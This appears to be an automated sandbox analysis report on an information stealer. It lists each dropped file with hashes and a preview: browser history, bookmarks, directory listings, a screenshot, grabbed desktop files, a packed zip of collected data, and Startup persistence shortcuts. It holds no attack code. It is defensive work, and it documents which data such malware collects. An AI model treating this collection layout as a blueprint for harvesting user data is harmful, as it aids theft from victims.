SHA-256:	6DFC01037FEE4B222086A6F1EDF201BF7952C5B6F9090F30DD30320972632005
SHA-512:	E8D7F00221CC9E681133506B27428384A3F96F62EB6AB749032D861396B160427BEC354AAECF3B062541F88D78CC389922D520DC7E1B1119182102950E72165E
Malicious:	false
Reputation:	unknown
Preview:	PJN2K-W4T8B-J6J38-PMMTG-MPDD4

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\System\ScanningNetworks.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	84
Entropy (8bit):	4.6630509827051725
Encrypted:	false
SSDEEP:	3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
MD5:	58CD2334CFC77DB470202487D5034610
SHA1:	61FA242465F53C9E64B3752FE76B2ADCCEB1F237
SHA-256:	59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
SHA-512:	C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
Malicious:	false
Reputation:	unknown
Preview:	Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\System\Windows.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	14637
Entropy (8bit):	5.642697713926756
Encrypted:	false
SSDEEP:	48:DyCayCDyCQNyCdyCcyCgyCFyCIyC8yCLyCuyCAyCUyCJyCoyCJyzFMfNyCSyCYy9:xyzqTc5J8Ed
MD5:	9516B94F40084A0D5C091AC96ADF9C1C
SHA1:	67135EA254D25BF55DAC1A3F99C96634D9B989E1
SHA-256:	9758EDB4922E3FDC5B30F4E78D00A76C70C426058587F90005FECAC67FFAFBCD
SHA-512:	F865376C17B0B428D76A5886118ED47DB6042CC8A85EAFD7C856F5EDC63C54FD81E8BF261BF8C6B56F93CB9C8FBB70ED15869B0FB03E84DBC5A4D704FC63F8A2
Malicious:	false
Reputation:	unknown
Preview:	NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6456..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 2144..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6884..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6160..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6648..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Ch

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\System\WorldWind.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	81599
Entropy (8bit):	7.794743429152203
Encrypted:	false
SSDEEP:	1536:C3IPMZurfQ4pchCNj4Sqzd3bG/KkifU8iwWuCruN+iTeeoTJr4:eI0ZyI4pcgqzdr8XHXzqclr4
MD5:	C2D0F6442AC70CF7172B54758F18CBC4
SHA1:	5F4384CD128972F6F2153FDEB8A6F725424F6642
SHA-256:	42DB0ADFCDE8CF707022F99638AE5936529C7ED030C3CBD6A7BD5C9C91E2F33D
SHA-512:	B2038F0F537689FD10E3CF203AD779D59AB3F9E9A719C583C49071AD872822F29BC473F07AABC1783E957AC1ECD6304DA82608DEA720FB4390ADF7FE748C373E
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........;Yd@....1...m...g>....Vr....cFr....1mn..{}...D.q.........e..5.R....a..Y..z.8?.GZ...-5..JZ).J)h........;...zA...^.....^..g._k...v..gb..._.b.[............y..g.,.c..:...qtk..........Ek..E..s..Q@....-..Q.c>...6.:.uj*q.f.iJ..ba.]..#Z..6................j...>......_#.....D..7.....I..........J.j...Bt]..QEjb.QE....k;U......!%..3....Ft.......5.[...p.oo;~....l

C:\Users\user\AppData\Local\81b75ad0ffe7dcf4dad1f56136de2177\msgid.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	unknown
Preview:	0

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	137173
Entropy (8bit):	7.915199951332383
Encrypted:	false
SSDEEP:	3072:U2mjNgVmHKmfMMhQR63uGXg84CmnIIuhx53H/7CuzL:Nmj2VmHKMMMSR63uog8tmnIR5XzjL
MD5:	0CCBC44138C15A1859F8B406A8D72ED2
SHA1:	7086425AB0015C46E5668505FFAAF2A76A4F6BBE
SHA-256:	A9839973262EF55650B5DD47F19FB8993EE19E57B3A6902956798D2EC4207020
SHA-512:	4867A85B19CF7C3526479D61934E21C889237305DEEF2E41C0590D1CD579943B3829198324D6860C5CA2A37E1E6B36C8543C812904561ED721D13F004E2FE01C
Malicious:	false
Reputation:	unknown
Preview:	PK........OG.X................Browsers\Edge\PK........q;.XQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK........q;.Xc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.3''QA..L#.....J_...\/.".._........_....1M_S....PK........p;.X..[.s...q.......Browsers\Google\History.txt..j.0...{.C.l.5..?(..9.m......&?..C.....l=..6.^..H.'K.e......V..R.\O...\|_....}..<.....2%......+$s...q.2.F..W....z.F...97.....S9..@.j.Jn.+7$....%!.q.C..+ .O...N.\-.zZ.W.....2../w.!..N...d.dj$..L..H...dJ.OI.K6E/9..\|.4i..A.y..)....9.)8P...5..O...J.M\gs.g>q......e....B..#....r...@.l.C ..(.....>K.wB........a.G..B.....Y.O..g....Z6..b......P....0.0...a_..PK........q;.X1.#.>...5.......Directories\Desktop.txteR.n. .\|.I..4i.@.....PI.vm.w.m.?..V..ycN...C....:.??E......8 ..&.J...0Bv....H+\%EW.6...8s$...a..&.7.....<...B...g.,$hw.ad..D..+4.n.QcM^'8I[4\.?.u.k.7,h....k......B.+o3...dEq...W..D"....+5.WZ.f.

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Reputation:	unknown
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Reputation:	unknown
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Browsers\Google\History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1393
Entropy (8bit):	5.241470443395582
Encrypted:	false
SSDEEP:	24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
MD5:	7F24357FFA354F2471DED45552B897D7
SHA1:	1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
SHA-256:	573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
SHA-512:	202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
Malicious:	false
Reputation:	unknown
Preview:	### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Directories\Desktop.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	821
Entropy (8bit):	5.2651980330864605
Encrypted:	false
SSDEEP:	24:EF3IgqkOTRfMnaD/lvsoYduOVdPXrvaI1w0+mwGD/mF3FYdOeeu:ECfbRfBrOuudP3ZrmB4Oeeu
MD5:	8BB6C23828842E60AD5CED543BF93F9D
SHA1:	FF35F3F5EBBFEDF9988E1CE74EEFFC16878FAFC6
SHA-256:	1B720EAD77E6D146B534367355FFE2316046CB071A7DFBC5D41C6E1ED50D1B10
SHA-512:	AE4BF3525C59F74077FB5041D30AA1AC5FACCA58C8A00B7882B43E3B0457A9C4757723E2F492DF4B9B8AE057710578DF2EFD9BF3183EACEE68A705B62695E5EE
Malicious:	false
Reputation:	unknown
Preview:	Desktop\...BPMLNOBVSB\...DVWHKMNFNN\...LTKMYBSEYZ\...ONBQCLYSPU\....HTAGVDFUIE.pdf....KZWFNRXYKI.mp3....LTKMYBSEYZ.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.xlsx....WUTJSCBCFX.png...UOOJJOZIRH\...VLZDGUKUTZ\....FENIVHOIKN.mp3....HTAGVDFUIE.xlsx....KZWFNRXYKI.jpg....NIKHQAIQAU.png....NWTVCDUMOB.pdf....VLZDGUKUTZ.docx...XZXHAVGRAG\....HTAGVDFUIE.mp3....KATAXZVCPS.png....ONBQCLYSPU.xlsx....UMMBDNEQBN.jpg....VLZDGUKUTZ.pdf....XZXHAVGRAG.docx...ZBEDCJPBEY\...ZTGJILHXQB\...desktop.ini...Excel.lnk...FENIVHOIKN.mp3...HTAGVDFUIE.mp3...HTAGVDFUIE.pdf...HTAGVDFUIE.xlsx...KATAXZVCPS.png...KZWFNRXYKI.jpg...KZWFNRXYKI.mp3...LTKMYBSEYZ.jpg...NIKHQAIQAU.png...NWTVCDUMOB.pdf...ONBQCLYSPU.docx...ONBQCLYSPU.xlsx...UMMBDNEQBN.jpg...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...VLZDGUKUTZ.pdf...WUTJSCBCFX.png...xj40xovMsm.exe...XZXHAVGRAG.docx..

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Directories\Documents.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	834
Entropy (8bit):	5.30276653598512
Encrypted:	false
SSDEEP:	24:oF3IgqkOTRfMnaD/lvsoYduOVhvaI1w0+mwGD/mF3FYdOeR:oCfbRfBrOuudZrmB4OeR
MD5:	3E77FD5851164F7116CA1DE185B21926
SHA1:	B03D5601F6E6DC15B54F82C854A49C0BCA45214C
SHA-256:	F71D584001783610360FC7294A824FF60435453CD7304DD204474B505EB70413
SHA-512:	5A4C0555321CD50086A0A14A57FDDE961E3A95E55944377FF3E9EAFEDE8007001CC842F290EA9B85DD551DC1911CF34E921A417A25CDB2C550BABD0796ED0269
Malicious:	false
Reputation:	unknown
Preview:	Documents\...BPMLNOBVSB\...DVWHKMNFNN\...LTKMYBSEYZ\...My Music\...My Pictures\...My Videos\...ONBQCLYSPU\....HTAGVDFUIE.pdf....KZWFNRXYKI.mp3....LTKMYBSEYZ.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.xlsx....WUTJSCBCFX.png...UOOJJOZIRH\...VLZDGUKUTZ\....FENIVHOIKN.mp3....HTAGVDFUIE.xlsx....KZWFNRXYKI.jpg....NIKHQAIQAU.png....NWTVCDUMOB.pdf....VLZDGUKUTZ.docx...XZXHAVGRAG\....HTAGVDFUIE.mp3....KATAXZVCPS.png....ONBQCLYSPU.xlsx....UMMBDNEQBN.jpg....VLZDGUKUTZ.pdf....XZXHAVGRAG.docx...ZBEDCJPBEY\...ZTGJILHXQB\...desktop.ini...FENIVHOIKN.mp3...HTAGVDFUIE.mp3...HTAGVDFUIE.pdf...HTAGVDFUIE.xlsx...KATAXZVCPS.png...KZWFNRXYKI.jpg...KZWFNRXYKI.mp3...LTKMYBSEYZ.jpg...NIKHQAIQAU.png...NWTVCDUMOB.pdf...ONBQCLYSPU.docx...ONBQCLYSPU.xlsx...UMMBDNEQBN.jpg...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...VLZDGUKUTZ.pdf...WUTJSCBCFX.png...XZXHAVGRAG.docx..

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.285684426154722
Encrypted:	false
SSDEEP:	6:3tSLKJswhjzAhjHs1j0/eyPcMuhOLt7ydsd+kGDysmFEKTFYd/r53raj7IsNubSM:QLKJsqvaI1w/8wLmwGDysmFEKTFYdjxL
MD5:	8309266C95CA0536FA7C7D24DD510A68
SHA1:	1B5FEF428E41596A839B7C8C5113F351562C7F86
SHA-256:	70FEC1166A36BC10FD82C09C5380E24DA6E673AD02CCC57110501684865360C8
SHA-512:	0761522F3023B5E91636645F0CC2807B1DA8AB42D25036FD0259811F8D8CABDC6107AD3253690B377CD997849C031B46DAB14D494C5597E3D55905A2622D4215
Malicious:	false
Reputation:	unknown
Preview:	Downloads\...desktop.ini...FENIVHOIKN.mp3...HTAGVDFUIE.mp3...HTAGVDFUIE.pdf...HTAGVDFUIE.xlsx...KATAXZVCPS.png...KZWFNRXYKI.jpg...KZWFNRXYKI.mp3...LTKMYBSEYZ.jpg...NIKHQAIQAU.png...NWTVCDUMOB.pdf...ONBQCLYSPU.docx...ONBQCLYSPU.xlsx...UMMBDNEQBN.jpg...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...VLZDGUKUTZ.pdf...WUTJSCBCFX.png...XZXHAVGRAG.docx..

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Reputation:	unknown
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Reputation:	unknown
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Directories\Startup.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	180
Entropy (8bit):	4.5224726418616354
Encrypted:	false
SSDEEP:	3:jgBLKeUWCgovXAsHL4/ovXASt0dAgovXAgH+t4/ovXAg+LNL0ovXA+OcwKovn:j4LKdsovXAsr4/ovXA/d/ovXAgeIovXR
MD5:	2BF23DFFD4049B0B64D28F7FC1A78C81
SHA1:	36741B2AED9716DEB9E134102496A972E88101D2
SHA-256:	579028C4D5F59005F70DE46A4BF93790145FC6EED73CF4EB12549D0004F08227
SHA-512:	37E2B67F31946567FF2E31EB8E401E1C1A16EAC5C8BED0A097B5FF2653D18358CA019E052BD4758501F326B87352D91B5BB315F1E9DD1CCB4375829DCFEDEE4E
Malicious:	false
Reputation:	unknown
Preview:	Startup\...desktop.ini...psvhost.exe.lnk...Service_Adobe.exe.lnk...Service_com.adobe.dunamis.exe.lnk...Service_Microsoft.exe.lnk...Service_Mozilla.exe.lnk...Service_Skype.exe.lnk..

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Directories\Temp.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4669
Entropy (8bit):	5.336535521470021
Encrypted:	false
SSDEEP:	96:4jzcRPTmt6qESfsNwThEfY0Vr6ZxqdhewrbIGVpN7lIdkrU9mC6BlOdswiNAjLYJ:BtbSkdr6ZoTxUKuq
MD5:	96592EBFDB5805784D2A087F41E23EDA
SHA1:	ADE6321E27020C688457C74F17AF0CC752578E93
SHA-256:	23EFD806626CBCAE13564BEAE180C92CB43577299D35C2C7587B5BD0BCEAB40D
SHA-512:	FDC477472742CB0F0AD7B827DD32C7A4D1C021BCBA24BE992CA5771983C711298C38A1F468EC99FB4178346FC176E0D8E04510784EF8F136513BF72B65C63D52
Malicious:	false
Reputation:	unknown
Preview:	Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Directories\Videos.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Reputation:	unknown
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
